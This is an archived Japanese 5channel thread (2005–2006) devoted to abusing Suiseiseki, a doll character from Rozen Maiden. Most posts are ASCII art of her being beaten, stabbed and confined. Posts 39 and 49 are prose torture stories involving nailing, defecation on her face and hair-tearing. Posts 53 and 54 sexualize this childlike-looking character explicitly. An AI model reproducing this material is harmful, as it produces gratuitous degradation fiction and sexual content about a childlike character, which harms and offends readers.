5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【性悪】翠星石虐待スレ【人形】

1 :名無しかわいいよ名無し:2005/12/29(木) 01:54:36 ID:Z6Yk2qhs
      く/',二二ヽ>
       |l |ノノイハ))  虐待なんてできるもんなら
       |l |#゚听ノl|      してみやがれですぅ♪
      ノl⊂l_介」つ ローゼンメイデン一可愛い翠星石を
.      /ノ>、,.<ヽ\ 虐待するAAや文章をつくることなんか
.      `<_/ |. ヽ_ン'  チビ、デブ、ハゲ、バカな人間にはできっこないはずですぅ♪
        ∪∪
        ‖‖
       ε  З ドカドカ

2 :名無しかわいいよ名無し:2005/12/29(木) 01:57:09 ID:/TnFYs2c


3 :名無しかわいいよ名無し:2005/12/29(木) 02:29:38 ID:Z6Yk2qhs
     ⊂且∩      ___
 ♪   (・x・ )   . く人二,'ヽ>
     (_ ̄iつ ,---'、< >))|l
  ( ((  |人 (      VД´iリ|
      `/ /  ) ))⊂l_介_|)|ヘ
       i _|ヽ   ≦ノヽノ`ヘ.≧
       |_)'。   ミ<二二二>ミ
        ∵
        ∴+

4 :名無しかわいいよ名無し:2005/12/29(木) 02:32:07 ID:Z6Yk2qhs
           _,-,
    ⊂iヾ、 ∩且つ/      ___   
    ≡ \ .( ・x・)/    く/',二二ヽ>
        ヽ i' |,へ    |l |ノノイハ))
 ≡       )人i 、ゝ. 人l|リ`Д´ノl|
         / /   ヽ< >l_介」つ
    ≡   //  ゚∴.  Vノ`ヽノヘ≧
       (/    ∵+.  ミく二二二〉ミ

5 :名無しかわいいよ名無し:2005/12/29(木) 02:34:47 ID:Z6Yk2qhs
     _/)
    / / 且 つ
     \(・x・ )⌒_)⊃
      / '  (
     i⌒iヽ _, ゞ
     ∪/ ,/   ∴
      i人| +∵。
     く< >ヽ>
    ,.ζl | Vノイハ))
 ⊂'⌒≦つリ>_<ノミつ

6 :名無しかわいいよ名無し:2005/12/29(木) 02:37:23 ID:Z6Yk2qhs
          .∞ 〜
     く/',二二ヽ>
  ν⌒,,ζl |ノノイハ))
 ⊂_:#:≦|#:;)Д。#)

7 :名無しかわいいよ名無し:2005/12/29(木) 03:05:30 ID:Z6Yk2qhs
  翠 星 石 (すいせいせき)
 ───────────────────────
 人体に近い皮膚感と骨格の組み込みによりリアルな抱き心地

                                ,,,,,,,、
●つなぎめの目立たない精巧なつくり。  ,,..、ヽ、   (iiiiiiiiヽ>
●お年寄り特有の前後屈曲を再現。   ;'"~ヽ、,)  `:、iiiii|>
●丈夫で扱いやすい皮膚素材。     l@。。@/     ヽ-'
●下肢・股関節の動きもスムーズ. デスゥ>ヽAノ"l   かつら
                       ,/i"ヽ'、,ノヽ、
                      ,:' ,..|     ;' ヽ:
                    ,:'~,:'~ ,i     ;、 ヽ:
                   /丶' 。(_ ;    `/、ヽ,
                   / /  ,../.ヽ。ノ  i ヽ  i;
     ,,            /、/_._._/    ヽ:、i  ヽ ,i;
     i,ヽ,、      ,,...-.-,i. i i _ _, ..;.'  、 ,i" ,/'~ /
     ヽヽヽ、_ _ ..-:::::' ,...,;-'ヾ~~" ~     ),/ ,/~,/
      |,,,.ヽ ヽ、,... .::-::"   ,、_ _    __..丿'`ヽ,:'
        |  ,.. . .... .... ..,::-:" ~ ~ ^ ~ ~ ~, /,.,;'~
        `-'" ~ ~ ~ ~~           ~ "~
 | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|
 |  身長:.80cm 重量:.約5kg シリコン製 寝衣付き  |
 |                     ¥504,000(税込価格)|
 |_______________________|

8 :名無しかわいいよ名無し:2005/12/29(木) 03:15:35 ID:Z6Yk2qhs
                    .  r―
           _.. ー''''''''''''ー-,、.├ーーi
      _/゛        r-ト|   |
     ./            ,!  `ゝ、、!  __,,..,  痛いですぅ
     l            /     `''!二`-冖'^l'|       ._,,,.... -、、
     .,!       _,, ./         `゙''''ーイl_,, -''''"゛   ._,,.. i-゙''i
     .,!  ,i―ー''"゛  ヽ\    .`゙゙゙゙゙ ̄ ̄     .,,,..-'',゙,,.. -←!、
     !.,ノ'、         ゙i.\  ''-..,,,,____________yrメ゙‐''"゛ _.. -―'''';`''i
.r'"゙゙) i、 `' ゝ           i 、\、               ,,..;;ニ>''^^^^''/.,,/
.゙ヽ//  ̄'''''''''!ヽ        i .l, ヽ`''ー、,,,__     .,/""   ._,_ノ-!lニ......,,、
  `l′      ヽ       i..l   ヽ_/ゝ、. ̄ ̄ ̄\._.. ‐'',゙ン-'''''''"゙゙゙゙゛ / フ' ゝ
   ヽ―――、  .ヽ    !   i ゙l  /l;;-、 `'ヽ     ヽ┬″ー二二二二 ト" ,i
           ヽt-ゝ    .l  |  l / l . \        ,i'ソ\ ._、-'''^^^^^゙フ┘/
           // /l;"   l   i  ! | .lt、         ,rソ゛  .\ '''''''"''''.l. /
        // /八    .| .l  l ./ . ! l    ._ '.ソ      ゙''''lニ´゙,゙7/'´
        l_|  リ  i   .! /  .l/ / . l .ィ ,..r ソ        │ .゙l'´
          ̄    i   |/  . ! /   !゙'l゙  l'ソ         /゙フ,ヽ
             i  /  .i/゛ ./  |./   | .i-、      /イ   l
              i /  .〃 /   / .il゙.―| ,!  ,,-‐'二/  ヽ―"
                 l′ .〃  l   /  〃 .l゙ | r″ /´ヽ
                /  /!   .|,,..-/ !  l |  .! │'i..,゙゙,/、 .ヽ
                ! 丿i  l゙ .丿 | │ !  l  , /  ̄ ヽ―′
               ̄ !  ン   |  |、 i/ ゙ /
                ゙^゙´    .l_レ" /  ̄
                       ヽ--′

9 :名無しかわいいよ名無し:2005/12/29(木) 03:21:10 ID:Z6Yk2qhs
    /⌒⌒ヽ          ___
    //ゞ\※        く/',二二ヽ>
    §!゚ ヮ゚ノ§     ブスッ |l |ノノイハ))
    ミ([{.∞}]ミつ≡三二≡=☆|l )))Д´)
     /(__ハ_)         ノl_|(l_介」).|
      `しテ         ≦ノ`ヽノヘ≧
                ミく二二二〉ミ


10 :名無しかわいいよ名無し:2005/12/29(木) 03:36:26 ID:Z6Yk2qhs
    , .-=- ,、 
 ヽr'._ rノ.'   ',   ___ 
 //`Y, ⌒⌒ヽ)/',二二ヽ>
 i |丿(リノヽ、卯)|l |ノノイハ))
 ヽ>,/9、゚ ヮ゚ノミ,つ);`Д´ノl|  や、やめやがれですぅ!
  `ー(ミi∞iミノ ノ⊂l_介」つ
    (,,( ),,)≦ノ`ヽノヘ ≧
    `しン′ミく二二二〉ミ


11 :名無しかわいいよ名無し:2005/12/29(木) 03:49:56 ID:Z6Yk2qhs
     く/',二二ヽ>
     |l |ノノイハ))
      |l |リ゚ ヮ゚ノl|   手が滑ったですぅ
     ノl_|(l_介」二つ
    ≦ノ`ヽノヘ≧   ‖
.   ミく二二二〉ミ  ‖
 ̄ ̄ ̄ ̄ ̄ ̄ ̄|   ‖
  ★             
             ┃
              フ
           ┌──┐
           i二ニニ二i
           i´ノノノヽ)))
            Wリ゚ -゚ノリ
            ⊂)_介」つΟΟ
             〈__l__〉   Χ
             〈_ハ_〉

12 :名無しかわいいよ名無し:2005/12/29(木) 03:50:58 ID:Z6Yk2qhs
      ___   て
     く/',二二ヽ> て
     |l |ノノイハ))
      |l |リ;゚ o゚ノl|
     ノl_|(l_介」二つ
    ≦ノ`ヽノヘ≧   ‖
.   ミく二二二〉ミ   ‖
 ̄ ̄ ̄ ̄ ̄ ̄ ̄|   .‖
                ‖
                ‖
                ‖
                ‖
                ‖
                ‖
                ┃
                |フ
         ≡  ≡ ≡ =
         = ≡ = 三 ≡ フッ
         ≡ 三 三 ≡ =
         = ≡= =三≡

13 :名無しかわいいよ名無し:2005/12/29(木) 03:53:05 ID:Z6Yk2qhs
┌──┐       ___   て
i二ニニ二i     く/',二二ヽ> て
i´ノノノヽ)))      |l |ノノイハ))
Wリ゚ -゚ノリ Χ    |l |リ;゚Д゚ノl
⊂)_介」つΟΟ  .ノl_|(l_介」).|
 〈__l__〉      .≦ノ`ヽノヘ≧
. 〈_ハ_〉     ミく二二二〉ミ
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|

14 :名無しかわいいよ名無し:2005/12/29(木) 03:54:12 ID:Z6Yk2qhs
     〜・
        ____・〜
    〜・ く',二二ヽ>
        |l |ノノイハ)) ・
        |l |リ゚ p゚ノl|ξ
  ━━┳━━━━┳━━
      ┃        ┃
      ┃        ┃
      ┃        ┃

15 :名無しかわいいよ名無し:2005/12/29(木) 04:04:11 ID:Z6Yk2qhs
      // /  / ///i||(    i r'',. - '''""ブ: : : : : : : : : ;.;.;.;.;.;.;.;.;.;.゙
    /// // / //// ||| (   l /    /゙: : : : : : : : : ;.;.;.;.;.;.;.;.;.;.;.;.;.;.;゙ヽ
    / / //| / / /|//∧||(  i/      !i1: : : : : : : ;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.ヽ
   / / | || |// |.l/|//// |'| |( ,ノ ,.ニ、'   ゙ ';.: : : : : : ;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;ヽ
   / /  |||-|‐|////|/ l// l | |( r'ry',.,      ヽ: : : : :;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.゙i,
   | ,|  | |>||k、///|//ー|-||( ii゙:リ0 )- 、..,,_   ヽ: : : :;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.i
   | |  || { ::::!:}`//| /r=‐t、.| ,/i_;/'''"    `''' ー ヽ:;,;: -‐‐、;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.リ
    | |  ||  ゞ-'′ ′ | {::::::::}`|(             |/ ,.r  i;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;/
   ,<| (l\,,,,,,      `‐‐'′/`             ,}^i,  ノ;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;/
   /:::::::( ヽ"""  ′   """ ( _            ノ/ /;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;ノ
  /:::::::(  丶   マ´ ̄!   .("゙''┴==ヲ '           /|;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;./
  /:::::::::ノ ※ \  ヽ .ノ   _,, ゙'ーr‐'''~            /ー- ' !;.;.;.;.;.;.;.;.;.;.;.;.;.;/
 /:::::::ノ     )`‐┌ '、´,-、ノ ヾ)            ノ     ゙'ヽヽ、、;.;.;.;./、
./:::::::ノ ※   )::::::/~`l、>‐丿 ヾ\!       ,/    ::   ` `''>'´/


16 :名無しかわいいよ名無し:2005/12/29(木) 04:14:17 ID:Z6Yk2qhs
      .ィ/~~~' 、        ___
    、_/ /  ̄`ヽ}     く/二二,'ヽ>
   ,》@ i(从_从))    (((ハイ))|l|
.   ||ヽ|| ゚ -゚ノ| ||     |l´∀`.iリ|l|  何度も言ってるでしょ?
 三(⌒), 介ミ'})⊃      (l_介_|)|ヘ
    ≦ ノ,ノハヽ≧    ≦ノヽノ`ヘ.≧
  テ ` -tッァ-' テ     ミ<二二二>ミ

17 :名無しかわいいよ名無し:2005/12/29(木) 04:15:25 ID:Z6Yk2qhs
      .ィ/~~~' 、   ___
    、_/ /  ̄`ヽ} く/二二,'ヽ>
   ,》@ i(从_从))(((ハイ))|l|
.   ||ヽ|| ゚ -ノ| || |l´∀`.iリ|l|
   ≡≡三 三ニ⌒)介_|)|ヘ   ですですうるさいって・・
    ≦ ノ,ノハヽ  ≦ノヽノ`ヘ.≧
  テ ` -tッァ-'  ミ<二二二>ミ

18 :名無しかわいいよ名無し:2005/12/29(木) 04:16:29 ID:Z6Yk2qhs
      ./~~~' 、   ___
    、_ゝ===ヽ} く/二二,'ヽ>
   ,》ヾ..____...《y |l|((ハイ)))
   ノ ヽ人 ,ノ゚)ノ ):;:;)∀'''')
  ≦ /.i≦  ̄,ノ''_(l_介」)   何度言ったら分るの?!
  テ ノ,ノテ)ヽ~ ≦ノ`ヽノヘ
  ` -tッ~ヽァ-' ミく二二二〉ミ

19 :名無しかわいいよ名無し:2005/12/29(木) 04:17:36 ID:Z6Yk2qhs
      ./~~~' 、
    、_ゝ===ヽ}     ヽ l //
   ,》ヾ...____...《(⌒) ―― ★ ―――
    ノ ヽ人 ,ノノ ./|ll // | ヽ   ヴォケーー!!
  ≦(/.i≦ノi|ll/    / l  ヽ
  テ ノ,ノテ)ヽ:彡''    /  .l

20 :名無しかわいいよ名無し:2005/12/29(木) 04:29:16 ID:pC4oNfOb
なに?漫キャラ板に虐待板立てたの?
書いちゃうよ?AA板の住人&職人である俺が虐AA書いちゃうよ?
まあ、実際は虐AAは見るだけで少ししか書いたことが無いんだが、書いちゃうよ?
あー、でも虐待だけで虐殺が無いのはやりにくいなぁ。

21 :名無しかわいいよ名無し:2005/12/29(木) 04:42:19 ID:wl8QhX0z
   r@" ̄~@ヽ
  /ノリliliハiliハ
  ノ从リ ゚ヘ$ノ   |\l☆
  ノ从とi,,ξ,,iつ─‐l  l ガッ
 ノ从く,,,,ξ,,,>リ   人‐___ 
    U U   <  >二ヽ> 
            Vノノイハ)) 
            ||ヽ|| `Д´)| ノ
           ノl_|(l_介」).| 
           ≦ノ`ヽノヘ≧,
           ミく二二二〉ミ

22 :名無しかわいいよ名無し:2005/12/29(木) 04:44:11 ID:wl8QhX0z
   r@" ̄~@ヽ
  /ノリliliハililハ 「ビビディバビデェー♪ ムン!!」
  ノ从リ ゚ヘ $ノ    |\l☆
  ノ从とi,,ξ,,iつ─‐l  l ガッ  ☆
 ノ从く,,,,ξ,,,>リ   人‐___ /
    U U   <  >二ヽ> -☆
        ☆− Vノノイハ)) 
           ||\|| `Д´)| / 「ひでぶぅ〜!!!」
           ノl_|(l_介」).| 
           ≦ノ`ヽノヘ≧,
           ミく二二二〉ミ


23 :名無しかわいいよ名無し:2005/12/29(木) 23:15:26 ID:Z6Yk2qhs
>>20
ぜひぜひ書き込んでくださいな
虐殺もいいですよぉ

24 :名無しかわいいよ名無し:2005/12/29(木) 23:16:35 ID:Z6Yk2qhs
      ★
       \    .ィ/~~~' 、★   うぉぉおおおおおお
          、_/ /  ̄`ヽ}          ☆
      (⌒\ ,》@ i(从_从)) ⌒ヽ     /
       \.ヽ ||ヽ|#`Д´ノ ;.;  ⌒;.;;⌒ヾ    ★
        (m;\ヽ::⌒,,  r==ミヽ  .;   ) /
       (´┌─;m)   〈(((ノリi卯 _,.,. /
  ☆─ (´ i二ニニ二i⊂从゚Д゚#l|,': i><iヽ +
         (((/从从i   )   i /((ノノリノ))
      /⊂从゚д゚ ||W    :ヾ  ((ミiTдTノミ))⊃
     ___
   く/',二二ヽ>  \∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧/
   |l |ノノイハ)) < ケンカはやめやがれですーッ!!! >
   |∩#゚听ノ∩ /∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨\
   ノ l_|(l_介」)丿
  ≦ノ`ヽノヘ≧
  ミく二二二〉ミ

25 :名無しかわいいよ名無し:2005/12/29(木) 23:17:49 ID:Z6Yk2qhs
      ___   .              ┌- ,.,,-┐
  Σく/',二二ヽ>              〈|_,.ヘ_|>
    |l |ノノイハ))              (((从|从リλ
     |∩.゚ ∇゚ノ∩              |!ミt゚ヮ゚ !ミ|ミ| おめーがいうなよ性悪人形!なのー
    ノ l_|(l_介」)丿            .⊂[{.∞}]⊃
    ≦ノ`ヽノヘ≧                |_ハ__ゝ
.   ミく二二二〉ミ              `モテ

26 :名無しかわいいよ名無し:2005/12/29(木) 23:19:00 ID:Z6Yk2qhs
                      __∩__
                   .  _|      |_____
.    ┌- 、,. -┐       /   | おもし. |      ./l     ┌- ,.,,-┐
     く|_,.ヘ_|〉      /    |____.|     / .|     〈|_,.ヘ_|>
    ノ イ从|从)、    /     \ドンドン/   / ../|     (((从|从リλ
     |ミ|ミ!゚ ヮ゚ノミ!|    │ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄| ././     |!ミt゚ヮ゚ !ミ|ミ|
     `'' ([{.∞}]) '     ├───[ i ]────-||/./       .([{.∞}])
        /__ハ_|       |   [[二二二]]      |/           |_ハ__ゝ
      `もテ′     └─────────′            `モテ


27 :名無しかわいいよ名無し:2005/12/29(木) 23:49:31 ID:Z6Yk2qhs
                      __∩__
                    . _|      |________
      ___            /  .| おもし. |         ./l
     く/',二二ヽ>      /    |____.|        / ..|
     |l |ノノイハ)).    /     \ドンドン/       / ../|
      |l |リ ゚ 3゚).      | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄| ././
     ノl_|(l_介」).|.     ├─────[ i ]─────┤/./
    ≦ノ`ヽノヘ≧    |      [[二二二]]       |/
.   ミく二二二〉ミ..    └─────────────′
                  /JUM、早く開けて頂戴\

28 :名無しかわいいよ名無し:2005/12/29(木) 23:50:33 ID:Z6Yk2qhs
                                   /\
                                 /   ∂
                                 \     \
                               彡 \   /
                                  彡\/
                        ,-------------------、
                   /___[__ i __]_|||__/ ヽ、
                 ||| ヽ、::::::::::.,'~~~え.::::::::::|||:ヽ、ヽ、 |||
      ___  て         ヽ、:::{/´ ̄ヽヽ_,::::::::::::|||::ヽ、ヽ
     く/',二二ヽ> て      ||| lllヽ((从_从)i@《, __|||___ヽ/
     |l |ノノイハ))       ガパッ   /||从゚- ゚#/||| ::::::::::::::::::::/|
      |l |リ;゚Д゚)          /::::::||(({'ミ介ミ'})|| :::::::lll:::/ .ノ
     ノl_|(l_介」).|         |||┌─────∪───.||´./
    ≦ノ`ヽノヘ≧           │    [[二二二]]    .|/
   ミく二二二〉ミ.           └─────────´

29 :名無しかわいいよ名無し:2005/12/29(木) 23:51:21 ID:Z6Yk2qhs
      ____   っ                      ,'~~~え.
     く/',二二ヽ>  っ                       {/´ ̄ヽヽ_,
     |l |ノノイハ)) ≡                     ((从_从)i@《,
      |l |リ;゚ ヮ゚ノl|   ま、待つです真紅…          ||从゚- ゚#/||
   ( ⊂i,l_介」jつ )   話せばわかるですぅ…     ||(({'ミ介ミ'})||  ≡
    ≦ノ`ヽンヘ≧                      ≦ノ,ノハヽ、≧
.   ミく二二二〉ミ ≡                    て` -tッァ- ' て ≡

30 :名無しかわいいよ名無し:2005/12/29(木) 23:52:12 ID:Z6Yk2qhs
                        !!
      _               ____ っ           ,'~~~え
    ,',i><iヽ          く/',二二ヽ> っ        {/´ ̄ヽヽ    ナイスよ、雛苺
    /((ノノリノ))            l |ノノイハ))          ((从_从)i@《,
   ((ミi#゚ -゚ノミ))           |l |リ`Д´ノl|         ||从゚- ゚#/||
    (つ夲!つ 〜〜〜〜〜〜〜Ξ Ξ Ξ!|          ||(({'ミ介ミ'})||
     (ム!,,jム)  〜〜〜〜〜〜≦Ξ Ξ Ξ≧       ≦ノ,ノハヽ、≧
     し'ノ   〜〜〜〜〜〜ミく二二二〉ミ         て` -tッァ- ' て

31 :名無しかわいいよ名無し:2005/12/29(木) 23:53:06 ID:Z6Yk2qhs
                 蒼星石に頼んで
                   このまま切断してもらおうかしら          \ドンドン/
                                           _______________
      _           .ィ/~~~' 、                    /. ┃    ┃      ┃    ┃    /l
    ,',i><iヽ       、_/ /  ̄`ヽ}                  ┏━━╋━━╋━━━╋━━╋━━┓ .l
    /((ノノリノ))       ,》@ i(从_从))                /    ┃    ┃      ┃    ┃  /┃/|
   ((ミi#゚ -゚ノミ))        ||ヽ|| ゚ -゚ノ| ||                ┌╂──╂──╂───╂──╂┐  ┃./
    ⊂)夲!つ       || ({'ミ介ミ'}))||                 ├┃≡≡┃≡[ 封 ]≡≡┃≡≡┃┤/┃
     (ム!,,jム)       ≦ ノ,ノハヽ、≧                    │┃    ┃ [[≡三≡]]   ?┃    ┃│/
     し'ノ        テ ` -tッァ-' テ                 └┸──┸──┸───┸──┸′
                                          /許して欲しいですぅー\
                                             / さっさと開けろですぅー \

32 :名無しかわいいよ名無し:2005/12/30(金) 00:08:51 ID:79rq2gZE
      ∧_∧
     ( ´∀` )  ついに翠星石を捕獲したぞ!
     /⌒   `ヽ
    / /   ノ.\_M
    ( /ヽ    |\___E)
    \ /   |  _/ \_
      (   _ノ |/  __ \
      |   / /| く/',二二ヽ>|
      |   / /|  |l |ノノイハ)) |
      |  / / |  |l |#゚д゚ノl| | <放しやがれ!
      (  ) ) | ノl⊂_介」つ| |   こんちくしょー!ですぅ
      | | /  | ≦ノ`ヽノヘ≧ |
      | | |  |ミく二二二〉ミ|
     / |\\  ̄ ̄ ̄ ̄ ̄ ̄
     ∠/


33 :名無しかわいいよ名無し:2005/12/30(金) 00:12:47 ID:79rq2gZE
    , .-=- ,、
 ヽr'._ rノ.'   ',   ___     _|ヽ∧∧∧∧∧∧∧/ヽ
 //`Y, ⌒⌒ヽ)/',二二ヽ>   <のびやかにぎゃはっッ!!!>
 i |丿(リノヽ、卯)|l |ノノイハ))    l/|/V∨V\/∨V\/∨ヽ|
 ヽ>,/9、゚ ヮ゚ノミ,つ);`Д´ノl|
  `ー(ミi∞iミノ ノ⊂l_介」つ 0匚lアΞミミミミミミミミミミミミミミミミミミミミミミミミミミミミミミミミ
    (,,( ),,)≦ノ`ヽノヘ ≧       ミミミミミミミミミミミミミミミミミミミミミミミミミミミミミミミ
    `しン′ミく二二二〉ミ

34 :名無しかわいいよ名無し:2006/01/02(月) 01:42:21 ID:0pC0fP+O
  ___
 く/',二二ヽ> ―――――
   |l |ノノイハ)) ――――
    |∩#゚听ノ∩      ウ ヒャ――――――
    ノ l_|(l_介」)丿
     ≦ノ`ヽノヘ≧   ―――――
.      ミく二二二〉ミ

35 :名無しかわいいよ名無し:2006/01/02(月) 01:42:56 ID:0pC0fP+O
   ___
く/',二二ヽ> ―――――
   |l |ノノイハ)) ――――
  |l |リ;゚ o゚ノl|  ・・・・・・!
   |l    ――――
                  _|(l_介」).|
                     ≦ノ`ヽノヘ≧
.                      ミく二二二〉ミ

36 :名無しかわいいよ名無し:2006/01/07(土) 01:23:54 ID:3mAcyOfy
良スレだな

37 :名無しかわいいよ名無し:2006/01/07(土) 01:32:36 ID:5iwucXA8
翠ちゃん可哀想・・

38 :名無しかわいいよ名無し:2006/01/07(土) 01:51:39 ID:5iwucXA8
翠星石×ジュン萌えv

39 :名無しかわいいよ名無し:2006/01/07(土) 04:58:35 ID:nsjhhLt9
「やめろですぅ、チビ人間!」
「あぁ!なんか言ったか性悪人形!」
コン!コン!
「ヒィィィィ!右手が動かないですぅ、やめてくれですぅ!」
「あぁ!うるせぇよ!お前、少しは反省しろよ!俺の部屋汚しといて、翠星石はやってないです、だよふざけんな!お前しか家にいなっかっただろうが!ばればれ!」
コン!コン!コン!コン!コン!コン!
翠星石の左手、右足、左足が釘で床に打ち付けられる。もちろん血はでない。所詮は人形。
「痛いですぅ、翠星石は反省したです。だからやめろです、チビ人間」
「まったく反省してないな、ジャンクが!」
ブリュ、ブリュ、ブビッ、ブバッ!
ブリュリュウウウウウウウウウウウウウウウウウ!!!!!!
「やめろです、くさいです。何しやがるですかペッ、ぺっ」
身動きがとれない翠星石は顔にウンコをされてしまった。
「はぁぁぁ、すっきりした。なに吐き出してんだよ、ジャンク!喰えよ!」
「いやですぅ」
「あぁ!」
ゲシッ!
腹を踏まれた。
「ツッッッッッッッッ!」
床が水浸しに・・・
「血はでねぇのに、小便はでるのかよ。きったねぇ。これでもくらいな!」
「やめるです、チビ人間!お願いだからやめて・・・」
「だが、断る!」
ゴン!
腹部に五寸釘が打ち込まれる。

「チッ、気絶しやがったか・・・まぁいい、こんど何かしたらこの程度じゃすまさんぞ!」
パタン
ドアが閉まる。
部屋には床に打ち付けられ小便まみれのジャンクと化しか翠星石がさびしく取り残された

40 :名無しかわいいよ名無し:2006/01/07(土) 06:00:07 ID:GbXR2xlz
>>39
スプラッタ怖いよ(((;゚д゚)))

けどさ、だが断るはないでしょw

41 :名無しかわいいよ名無し:2006/01/08(日) 04:15:55 ID:IhEM7ywd
>>40
だが断るだとかなりバカにした感じがでるかなってw

思いついたらまた書きますね

42 :名無しかわいいよ名無し:2006/01/09(月) 01:50:37 ID:QIOPZ4FX
基地外……

43 :名無しかわいいよ名無し:2006/01/09(月) 02:00:06 ID:OBO552E3
職人ガンガレ

44 :名無しかわいいよ名無し:2006/01/09(月) 02:59:19 ID:e2mGK/Z9
もうちょっとラヴラヴなのがいいな

45 :名無しかわいいよ名無し:2006/01/09(月) 04:07:14 ID:bdoANcVY
どっちかというとおとなしい蒼星石を虐待したい

46 :名無しかわいいよ名無し:2006/01/09(月) 07:28:04 ID:OFNaGqpO
>>45
温和しい蒼だなんて陰湿すぎて後味悪いですよ
だからこそ元気な雛とか翠が標的に

47 :名無しかわいいよ名無し:2006/01/10(火) 12:21:08 ID:1wWJ6A41
職人期待あげ

48 :名無しかわいいよ名無し:2006/01/11(水) 06:00:06 ID:PW3qgQCT
             .ィ/~~~' 、
           、_/ /  ̄`ヽ}
           ,》@ i(从_从))
           ||ヽ|| ゚ -゚ノ| ||     
           || 〈iミ''介ミi〉||
       ─┬=====┬─┬―┬          
         ヽ┴-----┴ 、/_ /                      ___
        ==||:|:  :|: 「r-┴──o                く/二二,'ヽ>
 ____________ |:|:__ :|: ||--┬┘ ̄                (((ハイ))|l|
 |ミ///   /   ~~|ミ|丘百~((==___             Σ ||l゚Д゚.iリ|l|
└┼-┴─┴───┴──┐~~'''''-ゝ-┤              (l_介_|)|ヘ
 ((◎)~~~O~~~~~O~~(◎))三)──)三)              ≦ノヽノ`ヘ.≧
  ゝ(◎)(◎)(◎)(◎) (◎)ノ三ノ──ノ三ノ              ミ<二二二>ミ



49 :名無しかわいいよ名無し:2006/01/11(水) 06:26:15 ID:PW3qgQCT
「痛いです、はなすです」
翠星石の髪の毛が掴まれている。

「人形のくせにこんなに長い・・・人間なめてんの?」
グイ!
「やっ、やめるです。ハゲ人間のくせに生意気です!」
「立場がわかってないようだな!!」
髪の毛が真上に引っ張られる。足は宙に浮いている

「確か昔の漫画にこんなのがあったな」
グルグルグルグル
「いてぇです!髪掴んだまま、まわすなです!」
「なんか言ったか!」
「ふぅうう、何も言ってないです。痛いです!」
「うるせぇぞ」
手を離す。
ヒューーーーーーーーーン!  バン!
本棚にぶつかる

「ヒギャ!急に手を離すなです!痛いじゃないですか!」
「こうやって腕をたてに連続で回してから投げる魔球がむかしあってなぁ・・・。作者は書いてからボーグだって気づいたけど・・・開き直ってたな」
「知らないです!それよりなんてことするんですか!」
「人形の髪の毛をもって投げただけだけど!」
再び髪の毛が掴まれる。

「やめるです! ハゲ人間の髪がないのが翠星石のせいじゃないです!
「いいこと思いついた」

ビリッ!
「ひぎゃぁぁぁっぁぁぁぁっぁぁぁぁぁっぁぁぁ!」
「お前の髪の毛をこうやってむしりとればいいんだ!」
ビリャァァッァァァッァァァァッ!

「ヒイイイイイイィッィィッィィッィ!!!!痛いです!痛いです!痛いです!翠星石の髪を抜かないでです!」
そんな言葉にはおかまいなしにどんどんむしりとられていく!

「もうすっかりおそろいだな、はっはっはっ!俺のハゲよりひでぇけどな!」
「うう、ひどいです」
床に落ちた髪を手に取り涙を流す翠星石

「なに感傷にひたってんだ、性悪人形!掃除しとけよ!」
ゲシッ!
蹴られる。
「ヒグゥ!」
コツコツ、パタン
人間は出て行ったようだ

「どうして翠星石だけこんなめにあうですかぁぁぁぁぁぁぁぁぁぁぁ!」
ひとり泣き崩れた

50 :名無しかわいいよ名無し:2006/01/11(水) 11:24:39 ID:A8hkiFzv
それのAAほしい

51 :名無しかわいいよ名無し:2006/01/12(木) 02:08:49 ID:xAzTpnS7
本気で泣きそうになった

52 :名無しかわいいよ名無し:2006/01/12(木) 22:13:37 ID:zijXASI2
      ___
     く/',二二ヽ>
     |l |ノノイハ))
      |l |リ゚ д゚ノl|  すこやかに〜
     ノl_|(l_介」).|
    ≦ノ`ヽノヘ≧
.   ミく二二二〉ミ


      ___
     く/',二二ヽ>
     |l |ノノイハ))
      |l |リ゚ д゚ノl| のびやかに〜
        ))
       ((
        ))
       ((
        ))
       ((
     ノl_|(l_介」).|
    ≦ノ`ヽノヘ≧
.   ミく二二二〉ミ

53 :名無しかわいいよ名無し:2006/01/12(木) 22:45:40 ID:zijXASI2
↓どう見てもオナニーの最中
                   _ ......... __
               ,.ィ"/,. ィ'":.:.:.:\:.:`丶、
             / / ,:":.:.:.:.:.:.:.:.:.:.:.:ヽ:.:.:.:.:.\
            / ./ /:.:./:.:.:.:.:.:.:.|:.:ト;.:.:l:.:.:.:.:.ヽヽ
          /  / /:.:./:.:.:.:.:.:.:.:/:.:| ',:.:ト、:.:.!:.:.l:.',
         く   ,'  l:.:.:.:l:.:.:./:.:.://_/ .l:/ー-ヽ:.:| ',|
           ヽ、.」  l:.:.:.:.l:.:.l_:/フ ' /' 、,,,,,.ノ:./ ′
             /:.:.{  !:.:.:.:.Vr   ,,ィ ′  ///イ}
            /:.:.:.:{   ヘ:.:.:.:\=''"//   _   ハ!   おまんまん気持ちいいですぅ〜♪
           /:.:.:.:.:.{   ,イ_ヽT rr‐',  <ノ  , ' }    
          /:.:.:.:.:.:..{ r-,.‐-.、>、ヽヽヽ ..__/   } 
         /:.:.:.:.:.:.:.:{ </: : : : :ヽ} ヽ、  ,ヽ,‐;.:.::{

54 :名無しかわいいよ名無し:2006/01/12(木) 22:53:11 ID:zijXASI2
      く/',二二ヽ> 〜∞
   ν⌒. |l |ノノイハ))) 
  ⊂_:# |l リ#;)ДT#)  ・・・・・・・・・・・・・翠星石のおまんまんでもおくちでも使わせてやるですぅ
      ノl
      ≦

